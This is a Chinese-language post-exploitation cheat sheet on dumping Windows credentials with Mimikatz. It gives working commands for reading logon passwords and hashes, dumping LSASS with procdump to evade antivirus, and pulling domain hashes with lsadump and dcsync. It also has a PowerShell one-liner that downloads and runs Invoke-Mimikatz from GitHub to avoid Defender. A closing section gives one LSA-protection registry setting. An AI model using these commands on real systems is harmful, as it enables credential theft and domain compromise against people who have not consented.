Credential Access - Mimikatz === ###### tags: `post-exploitation` `Mimikatz` `LaZagne` :::info - **Taget:** Access credential - **Tools:** Mimikatz - **Content** 1. Download & Command 2. 基本介紹 3. 基本用法 4. 其他用法 5. Reference 6. LSA Protection ::: :mag: Download & Command --- - 下載請至 https://github.com/gentilkiwi/mimikatz/releases - 指令參考 https://kknews.cc/zh-tw/tech/gp8v2re.html :closed_book: 基本介紹 --- - 在Mimikatz上有**msv、wdigest、kerberous**三種形式查看密碼 - **sekurlsa::#{command}** 用來枚舉用戶憑證 - **privilege::#{command}** 用來調整各種權限 :dart: 基本用法 --- **Step**: 1. 先以系統管理員權限打開Mimikatz 2. 輸入 **privilege::debug** 目的在於提升權限，有了權限才能獲取 Credential  當出現**ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061** 的時候，表示你並非管理員，**必須去執行Step 1**  3. 輸入 sekurlsa::logonpasswords 抓取密碼，密碼通常以Hash形式顯示  :books: 其他用法 --- ### #1 Procdump + Mimikatz #### 原理 : 利用 Procdump 來加載 LSASS 所儲存的 Credential 文件，由於此文件直接打開會是亂碼，所以需要再利用Mimikatz對導出的文件進行分析，從而獲取密碼 #### 使用原因 : 因為Procdump是微軟的軟體，有數位簽章，是合法軟體，不會被防毒抓，所以使用Procdump可以把LSASS下載到攻擊者的電腦，在攻擊者端執行Mimikatz #### Step : * 先下載procdump.exe : https://docs.microsoft.com/en-us/sysinternals/downloads/procdump * 以管理員開啟CMD，進入存放procdump.exe的資料夾，輸入指令 : > procdump.exe -accepteula -ma lsass.exe lsass.dmp  * 如此一來就可以在資料夾下看到 lsass.dmp 檔案了，此時打開它只會出現一堆亂碼，接下來我們要用 Mimikatz 解析 lsass.dmp * 以系統管理員打開Mimikatz，並輸入 **sekurlsa::minidump lsass.dmp**，此sekurlsa::minidump指令用來切換到LSASS minidump的context  * 再輸入 sekurlsa::logonpasswords full 讀取整個密碼文件即可  --- ### #2 讀取Domain上所有User的Hash值 #### 注意 : 此指令需要在有AD環境的Computer上執行 #### 做法 : 因為需要管理员权限（使用 DEBUG 权限即可）或者是 SYSTEM 權限，所以需先privilege::debug提權，之後在mimikatz上輸入**lsadump::lsa /patch**，此指令目的是從LSA Server上獲取密碼  之後也可透過 **lsadump::dcsync /domain:#{domain_name} /user:#{user_name}** 來獲取Domain上特定User的訊息(包含Hash)  --- ### #3 Invoke-Mimikatz #### 使用原因 : 如果在Victim上下載mimikatz.exe是很有可能直接被Defenfer攔截，所以透過Invoke-Mimikatz可以避免，但也因為這招太出名了，現在也是會被Defender擋 可以透過下面指令在CMD上執行 ``` powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" ```  :mag: Reference --- - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - Procdump 下載及指令介紹(英文) - https://www.jianshu.com/p/4934f6c26475 - Mimikatz 基本使用 - https://cloud.tencent.com/developer/article/1752178 - Pass-The-Ticket Attack 教學 - https://kknews.cc/zh-tw/tech/gp8v2re.html - Mimikatz 指令說明 - https://blog.csdn.net/weixin_40412037/article/details/113348310 - Mimikatz 使用介紹 - https://zhuanlan.zhihu.com/p/59337564 - 防禦 Mimikatz 抓取密碼方法 - https://wooyun.js.org/drops/Mimikatz%20%E9%9D%9E%E5%AE%98%E6%96%B9%E6%8C%87%E5%8D%97%E5%92%8C%E5%91%BD%E4%BB%A4%E5%8F%82%E8%80%83_Part3.html - Mimikatz 詳細指令說明 - https://www.gushiciku.cn/pl/pLKj/zh-tw - Mimikatz 的18種免殺姿勢及防禦策略 - https://www.wangan.com/p/7fygf77e1fbedce8 - 多姿勢的Pass-The-Hash攻擊 - https://www.cnblogs.com/-mo-/p/11890232.html - Mimikatz 使用大全(極詳細) :closed_book: LSA Protection -- Microsoft為LSA提供了額外的保護,以防止不受信任的Process讀取內存或代碼注入。Windows 8.1之前的系统,攻擊者可以執行Mimikatz命令来與LSA交互並檢索存儲在LSA內存中的明文密碼 透過下面Command，即使獲取debug權限，也不能直接存取明文密碼或Hash ``` reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 1 /f ```